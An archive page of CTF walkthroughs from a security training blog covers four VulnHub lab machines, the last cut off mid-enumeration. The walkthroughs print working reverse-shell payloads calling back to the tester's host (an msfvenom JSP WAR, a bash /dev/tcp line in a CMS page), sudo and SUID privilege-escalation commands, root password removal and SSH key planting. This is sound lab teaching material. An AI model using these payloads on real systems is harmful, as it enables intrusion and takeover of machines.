vulnhub Archives - Armour Infosec

InfoSecWarrior CTF: 3 Walkthrough

Armour Infosec — Thu, 09 Apr 2020 18:25:45 +0000

Here is the new challenge of InfoSecWarrior CTF: 3 Walkthrough by Infosec Warrior CTF 2020. The box is designed by Vishal Biswas aka CyberKnight. The goal is to gain the highest privileges and collect only 2 flags (user flag and root flag). According to author box consist WordPress developer configured the machine to work internally. But due to some miss-configuration WordPress is exposed to the outside world. Use your skills and get the root flag. So let us go.

Pentester Methodology

Network Scanning

Netdiscover
Nmap

Enumeration

Nikto
phpMyAdmin
John
SSH

Privilege Escalation

Sudo -l
gcc compilation

Network Scanning

We start with Netdiscover to obtain IP address as followed

#netdiscover -i vboxnet0
	 Currently scanning: 192.168.12.0/16   |   Screen View: Unique Hosts                                                                                                                            
                                                                                                                                                                                                
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.2     08:00:27:a0:51:d5      1      42  PCS Systemtechnik GmbH                                                                                                                       
 192.168.2.17    08:00:27:a7:26:e1      1      60  PCS Systemtechnik GmbH

Got the machine Ip 192.168.2.17 and let us scan the Nmap.

#nmap -p- -A -O 192.168.2.17
Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-09 18:53 IST
Nmap scan report for 192.168.2.17
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)
|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)
|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TEST WORDPRESS – Just another WordPress site
MAC Address: 08:00:27:A7:26:E1 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/9%OT=22%CT=1%CU=44313%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=5E8F21EA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Enumeration

On visiting the web page there, we see a WordPress web site. But the WordPress website doesn’t work properly error here so we moved on our next step.

So I fired Nikto and found phpMyAdmin page.

#nikto -h http://192.168.2.17/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.2.17
+ Target Hostname: 192.168.2.17
+ Target Port: 80
+ Start Time: 2020-04-09 18:55:13 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2020-04-09 18:56:16 (GMT5.5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

so I logged in with credentials root: root. it was a success

We successfully login with the root MySQL database then I select the wpdb database on open the wp-user table and we see two user entries Krishna and user1 as shown in the image file.

I copy the users hash and save a text file and crack the hash using the john tool use the following command

john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 1.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
infosec					(?)
Session aborted

john --wordlist=/usr/share/wordlists/rockyou.txt user
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 23.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
user1					(?)
Session aborted

And we see WordPress hashes is cracked successfully and I try to login ssh using the WordPress credentials and us successful login with ssh Krishna shell. Krishna: infosec

#ssh krishna@192.168.2.17
The authenticity of host '192.168.2.17 (192.168.2.17)' can't be established.
ECDSA key fingerprint is SHA256:L8AFuzt5MRe4jDRpDukvoY4rrvpBMl49RbM0tbVdeVM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.17' (ECDSA) to the list of known hosts.
krishna@192.168.2.17's password: 
krishna@ck05:~$ id 
uid=1001(krishna) gid=1001(krishna) groups=1001(krishna)
krishna@ck05:~$ hostname
ck05
krishna@ck05:~$ whoami 
krishna

Got the Shell

Privilege Escalation

I ran the sudo -l command and I found Krishna has sudo permission to run a bash script as loopspell this script is compiler a #C language file using gcc using this command we privilege escalate this machine.

krishna@ck05:~$ sudo -l
Matching Defaults entries for krishna on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User krishna may run the following commands on ck05:
    (loopspell : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
krishna@ck05:~$ sudo -u loopspell /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
loopspell@ck05:~$ id 
uid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)
loopspell@ck05:~$ hostname
ck05
loopspell@ck05:~$ whoami 
loopspell

The sudo -l command and we see sudoers filer entry /usr/bin/gcc and code_compiler.sh. using sudo I again run the privilege escalation command and we have a root shell target machine

loopspell@ck05:/home$ cd loopspell/
loopspell@ck05:/home/loopspell$ ls 
backup.c  backup.txt  code_compiler.sh	user.txt
loopspell@ck05:/home/loopspell$ cat user.txt 
a4e3fea7510e570f6964899eb764abdc
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh 
Code is being compiling ...
gcc: fatal error: no input files
compilation terminated.
You can find your compiled code in /tmp/ directory.
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
root@ck05:/home/loopspell# id 
uid=0(root) gid=0(root) groups=0(root)
root@ck05:/home/loopspell# hostname
ck05
root@ck05:/home/loopspell# whoami
root
root@ck05:/home/loopspell# passwd
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
root@ck05:/home/loopspell# cd 
root@ck05:~# ls
msg.txt
root@ck05:~# cd /root/
root@ck05:/root# ls
root.txt
root@ck05:/root# cat root
cat: root: No such file or directory
root@ck05:/root# cat root.txt 
_________        ___.                 ____  __.      .__       .__     __    _______   .________
\_   ___ \___.__.\_ |__   ___________|    |/ _| ____ |__| ____ |  |___/  |_  \   _  \  |   ____/
/    \  \<   |  | | __ \_/ __ \_  __ \      <  /    \|  |/ ___\|  |  \   __\ /  /_\  \ |____  \ 
\     \___\___  | | \_\ \  ___/|  | \/    |  \|   |  \  / /_/  >   Y  \  |   \  \_/   \/       \
 \______  / ____| |___  /\___  >__|  |____|__ \___|  /__\___  /|___|  /__|    \_____  /______  /
        \/\/          \/     \/              \/    \/  /_____/      \/              \/       \/ 


flag = efa4c284b8e2a15674dfb369384c8bcf

This flag is a proof that you get the root shell.

Tag me on Twitter with @CyberKnight00 
root@ck05:/root#

Eureka !!!! got root.

The post InfoSecWarrior CTF: 3 Walkthrough appeared first on Armour Infosec.

My Tomcat Host Vulnhub Walkthrough

Armour Infosec — Thu, 09 Apr 2020 08:13:21 +0000

Hello everyone. This time I am sharing the walkthrough of a CTF machine designed by Akanksha Verma. This is a quick walkthrough of a vulnhub machine, My tomcat host. You can find this box on Infosec Warrior. According to there author it is a medium or intermediate level machine with good privilege escalation. So here we go.

Methodology applied :

Network Scanning

netdiscover
Nmap

Enumeration

Nmap
nikto
msfvenom

Privilege escalation

JAVA
sudo -l

Network Scanning

For scanning the network and obtaining the IP address of the box I used netdiscover. As shown below

#netdiscover -i vboxnet0
	Currently scanning: 192.168.18.0/16   |   Screen View: Unique Hosts                                                                                      
	2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102               
	_____________________________________________________________________________
	  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
	-----------------------------------------------------------------------------
	192.168.2.2     08:00:27:a8:2f:81      1      42  PCS Systemtechnik GmbH      
	192.168.2.15    08:00:27:f7:24:84      1      60  PCS Systemtechnik GmbH

So the IP of the box is 192.168.2.15. let’s start with Nmap scanning

#nmap -p- -A -O  192.168.2.15
	Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-09 09:52 IST
	Nmap scan report for 192.168.2.15
	Host is up (0.00044s latency).
	Not shown: 65533 filtered ports
	PORT     STATE SERVICE VERSION
	22/tcp   open  ssh     OpenSSH 6.6.1 (protocol 2.0)
	| ssh-hostkey: 
	|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
	|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
	|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
	8080/tcp open  http    Apache Tomcat 9.0.31
	|_http-favicon: Apache Tomcat
	|_http-title: Apache Tomcat/9.0.31
	MAC Address: 08:00:27:F7:24:84 (Oracle VirtualBox virtual NIC)
	Device type: general purpose
	Running: Linux 3.X|4.X
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
	Network Distance: 1 hop
	TRACEROUTE
	HOP RTT     ADDRESS
	1   0.44 ms 192.168.2.15

Enumeration :

We can see that there is an open port number 8080. So let us have a look there

Good there a Tomcat Host on the box. For more information, I fired nikto.

#nikto -h http://192.168.2.15:8080/
	
	- Nikto v2.1.6
	---------------------------------------------------------------------------
	+ Target IP:          192.168.2.15
	+ Target Hostname:    192.168.2.15
	+ Target Port:        8080
	+ Start Time:         2020-04-09 09:54:21 (GMT5.5)
	---------------------------------------------------------------------------
	+ Server: No banner retrieved
	+ The anti-clickjacking X-Frame-Options header is not present.
	+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
	+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
	+ No CGI Directories found (use '-C all' to force check all possible dirs)
	+ OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community
	+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
	+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
	+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
	+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
	+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
	+ /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 Happiness Page identified which includes internal application details.
	+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.
	+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
	+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
	+ /axis2/services/Version/getVersion: Apache Axis2 version identified.
	+ /axis2/services/listServices: Apache Axis2 WebServices identified.
	+ /axis2/axis2-web/index.jsp: Apache Axis2 Web Application identified.
	+ /host-manager/status: Default Tomcat Server Status interface found
	+ /manager/status: Tomcat Server Status interface found (pass protected)
	+ 8041 requests: 0 error(s) and 18 item(s) reported on remote host
	+ End Time:           2020-04-09 09:55:13 (GMT5.5) (52 seconds)
	---------------------------------------------------------------------------
	+ 1 host(s) tested

Out of all the things, the most important to us is that we have credentials for tomcat manager application, tomcat: tomcat. and the directory /manager/html page .

We were in the host and found there is a .war file upload option. So without wasting time I use msfvenom to generate a shell.war file

#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.2.1 LPORT=1505 -f war > armour.war
	
	Payload size: 1106 bytes
	The final size of war file: 1106 bytes

Where LHOST = listener host IP && LPORT = listener port

And we have our payload ready, and we are all set to launch the attack. Upload this shell.war file and call it on the browser while having the listener on, on our machine

#nc -nlvp 1505
	
	listening on [any] 1505 ...
 	connect to [192.168.2.1] from (UNKNOWN) [192.168.2.15] 57094
	id
	uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
	hostname
	my_tomcat
	whoami
	tomcat

Got the shell of the user tomcat

Privilege Escalation:

Firstly I converted the shell into the interactive shell and I checked them for permissions on sudo command :

sh-4.2$ id
	uid=998(tomcat) gid=997(tomcat) groups=997(tomcat)
	sh-4.2$ sudo -l
	Matching Defaults entries for tomcat on this host:
	    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
	    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
	    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
	    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
	    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
	    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
	    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

	User tomcat may run the following commands on this host:
	    (ALL) NOPASSWD:
	    /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java

I see that we can run java command with sudo privileges. You can find the program from any place, I got it on stack overflow.

import java.io.BufferedReader;
	import java.io.InputStreamReader;

	public class armour {  //you have to change thew class same as file name
	    public static void main(String args[]) {
	        String s;
	        Process p;
	        try {
	            p = Runtime.getRuntime().exec("passwd -d root");  //the command you want to execute
	            BufferedReader br = new BufferedReader(
	                new InputStreamReader(p.getInputStream()));
	            while ((s = br.readLine()) != null)
	                System.out.println("line: " + s);
	            p.waitFor();
	            System.out.println ("exit: " + p.exitValue());
	            p.destroy();
	        } catch (Exception e) {}
	    }
	}

now I compile the code and executed it.

bash-4.2$ javac armour.java
	bash-4.2$ sudo java armour
	line: Removing password for user root.
	line: passwd: Success
	exit: 0
	bash-4.2$ su root
	[root@my_tomcat tmp]# id 
	uid=0(root) gid=0(root) groups=0(root)
	[root@my_tomcat tmp]# hostname 
	my_tomcat
	[root@my_tomcat tmp]# whoami 
	root
	[root@my_tomcat tmp]# uname -a
	Linux my_tomcat 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
	[root@my_tomcat tmp]# cd /root/
	[root@my_tomcat ~]# ls
	proof.txt
	[root@my_tomcat ~]# cat proof.txt 
	Best of Luck
	628435356e49f976bab2c04948d22fe4
	[root@my_tomcat ~]#

Boom !!! Eureka !!! I Got root …… and here is the flag.

The post My Tomcat Host Vulnhub Walkthrough appeared first on Armour Infosec.

It’s October Vulnhub Walkthrough

Armour Infosec — Tue, 07 Apr 2020 11:27:53 +0000

Here’s the new challenge of “It’s October Vulnhub Walkthrough”. It’s October is an easy box for the beginner and wannabe hackers. It is a box learning about October CMS and enumeration. The box was designed by Akansha Verma. This machine got something unique as it teaches you how you can exploit a cms even if you can’t find any known vulnerability.

Pentester Methodology

Network Scanning

nmap
netdiscover

Enumeration

nikto
gobuster
placing of reverse shell

Privilege Escalation

abusing SETUID

Network Discovery

In order to get the IP of the machine I used, netdiscover. As I allotted host-only adapter to my machine.

#netdiscover -i vboxnet0

Currently scanning: 192.168.157.0/16   |   Screen View: Unique Hosts                                                                                        
4 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 222               
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.2.2     08:00:27:ac:26:45      1      42  PCS Systemtechnik GmbH      
192.168.2.12    08:00:27:cb:f2:fb      3     180  PCS Systemtechnik GmbH

And got my IP : 192.168.2.12. Now lets begin with nmap scan.

#nmap -A -O -sS -sC -p- 192.168.2.12

Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-06 18:59 IST
Nmap scan report for 192.168.2.12
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 27:21:9e:b5:39:63:e9:1f:2c:b2:6b:d3:3a:5f:31:7b (RSA)
|   256 bf:90:8a:a5:d7:e5:de:89:e6:1a:36:a1:93:40:18:57 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Homepage | My new websites
3306/tcp open  mysql   MySQL (unauthorized)
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: My Note
MAC Address: 08:00:27:CB:F2:FB (Oracle VirtualBox virtual NIC)

I saw that ports 80 and 8080 are open, so without any delay, I visited the page.

It’s just a normal website. I don’t get anything useful in page source. But still moving forward.

This is also a simple web page. But it consists a clue in the page source to visit 192.168.2.12/mynote.txt

We got credentials for cms admin:adminadmin2. I used nikto for further enumeration but nothing much.

So I tried directory brute-forcing. I used gobuster and found a directory /backend showing the code 302.

#gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -u http://192.168.2.12/

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.2.12/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/06 19:14:00 Starting gobuster
===============================================================
/themes (Status: 301)
/modules (Status: 301)
/0 (Status: 200)
/storage (Status: 301)
/plugins (Status: 301)
/backend (Status: 302)
/vendor (Status: 301)
/config (Status: 301)
Progress: 13383 / 220561 (6.07%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/04/06 19:22:15 Finished
===============================================================

Eureka. We got a CMS login page of OCTOBER CMS. I the old credential for the login.

And we are in.. The first checkpoint arrived. Now we need to upload a reverse shell on the CMS in order to get a shell. So for that, we open cms tab on the Dashboard> click on +ADD>enter the details of the page along with the shell>Save it.

function onstart(){
     exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.2.1/1505 0>&1'");
}

Now start the listener on the local machine and call the web page on the web.

#nc -nlvp 1505

listening on [any] 1505 ...
connect to [192.168.2.1] from (UNKNOWN) [192.168.2.12] 4038
bash-5.0$ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege Escalation:

Now for the privilege, I got nothing but a local user named armour. Then we checked for suid:

bash-5.0$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/newgrp
/usr/bin/su
/usr/bin/python3
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/umount
/usr/bin/python3.7
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

So we got SUID bit configured on /bin/python3. We can approach for the root using this.

bash-5.0$ cd /tmp/
bash-5.0$ vim armour.py 

 #!/usr/bin/python
 import os
 os.execl("/bin/bash","sh","-p")
 ~                                                                               
 ~                                                                               
 ~                                                                               
 ~                                                                               
 :wq!
                                                                                                
bash-5.0$ chmod 777 armour.py 
bash-5.0$ python3 armour.py 

sh-5.0# id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
sh-5.0# cd /root/
sh-5.0# ls
proof.txt
sh-5.0# cat proof.txt 
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

BOOM! we have the flag and euid of root!!. But we need to get the proper shell so I transfer the authorized_keys to the machine and called for ssh connection.

sh-5.0# cd /root/.ssh
sh-5.0# wget http://192.168.2.1:8080/authorized_keys 
--2020-04-06 10:23:55--  http://192.168.2.1:8080/authorized_keys
Connecting to 192.168.2.1:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 569 [application/octet-stream]
Saving to: ‘authorized_keys’

authorized_keys     100%[===================>]     569  --.-KB/s    in 0s      

2020-04-06 10:23:55 (41.3 MB/s) - ‘authorized_keys’ saved [569/569]

sh-5.0# ls 
authorized_keys

#ssh 192.168.2.12
The authenticity of host '192.168.2.12 (192.168.2.12)' can't be established.
ECDSA key fingerprint is SHA256:DYZkjGYMu99f1Ml7F6XHJ+4Oh/GISu41/GP0Y+yMgpg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.12' (ECDSA) to the list of known hosts.
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    It's October	                                        #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################                                       IP:\4
                                       Hostname: \n
Debian GNU/Linux 10
Linux october 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Mar 27 10:53:25 2020 from 192.168.1.6

root@october:~# id
uid=0(root) gid=0(root) groups=0(root)
root@october:~# hostname
october
root@october:~# uname -a
Linux october 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
root@october:~# cd 
root@october:~# cat proof.txt 
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

The post It’s October Vulnhub Walkthrough appeared first on Armour Infosec.

My File Server: 3 Walkthrough

Armour Infosec — Mon, 06 Apr 2020 05:36:39 +0000

I will share with you a new Walkthrough for Infosec Warriors CTF machines. My File Server: 3 Walkthrough for the CTF machine is created by Vishal Biswas AKA Cyberknight. You can download here this CTF. It states the level is Intermediate level and that is true. Either way, you explore a little if this is unfamiliar and that’s how you learn.

Penetration Testing Methodologies

Network Scan

Netdicover
Nmap Enumeration

Enumeration

Nikto
Nmap Scripts
Injecting authorized_keys via smb
ProFTPd 1.3.5 File Copy

Privilege Escalation

Buffer overflow
Capture the Flag.
password
sudo

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host found is 192.168.2.11

#netdiscover -i vboxnet0

 Currently scanning: 192.168.60.0/16 | Screen View: Unique Hosts

 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
 _____________________________________________________________________________
 IP At         MAC Address       Count  Len MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.2.2   08:00:27:25:0f:48  1      42 PCS Systemtechnik GmbH
 192.168.2.11  08:00:27:a8:98:39  1      60 PCS Systemtechnik GmbH

Let’s proceed with a network scan using Nmap aggressive scan as given below.

#nmap -p- -A -sC -O 192.168.2.11

 Nmap scan report for 192.168.2.11
 Not shown: 65523 closed ports
 PORT STATE SERVICE VERSION
 21/tcp open ftp vsftpd 3.0.2
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]
 | ftp-syst:
 | vsFTPd 3.0.2 - secure, fast, stable
 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
 | ssh-hostkey:
 | 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)
 80/tcp open http Apache httpd 2.4.6 ((CentOS))
 | http-methods:
 |_http-server-header: Apache/2.4.6 (CentOS)
 |_http-title: My File Server
 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
 445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
 1337/tcp open waste?
 | fingerprint-strings:
 | GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, TerminalServerCookie:
 |_ Why are you here ?!
 2049/tcp open nfs_acl 3 (RPC #100227)
 2121/tcp open ftp ProFTPD 1.3.5
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 |_drwxrwxrwx 3 root root 16 Feb 19 07:48 pub [NSE: writeable]
 20048/tcp open mountd 1-3 (RPC #100005)
 35756/tcp open nlockmgr 1-4 (RPC #100021)
 35992/tcp open status 1 (RPC #100024)
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
 Device type: general purpose
 Running: Linux 3.X
 OS CPE: cpe:/o:linux:linux_kernel:3
 OS details: Linux 3.4 - 3.10
 Network Distance: 1 hop
 Service Info: Host: FILESERVER; OS: Unix
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Enumeration

It was very interesting. I noticed many ports were open and have Anonymous Login enabled. So I decided to enumerate more with Nmap scripts. Along with port number 80.

#nmap -p 139,445 --script=smb-enum* 192.168.2.11

 Nmap scan report for 192.168.2.11
 PORT STATE SERVICE
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 MAC Address: 08:00:27:A8:98:39 (Oracle VirtualBox virtual NIC)
 Host script results:
 | smb-enum-shares:
 | account_used: 
 | \\192.168.2.11\IPC$:
 | Type: STYPE_IPC_HIDDEN
 | Comment: IPC Service (Samba 4.9.1)
 | Max Users: 
 | Path: C:\tmp
 | Anonymous access: READ/WRITE
 | \\192.168.2.11\print$:
 | Type: STYPE_DISKTREE
 | Comment: Printer Drivers
 | Users: 0
 | Max Users: 
 | Path: C:\var\lib\samba\drivers
 | Anonymous access: 
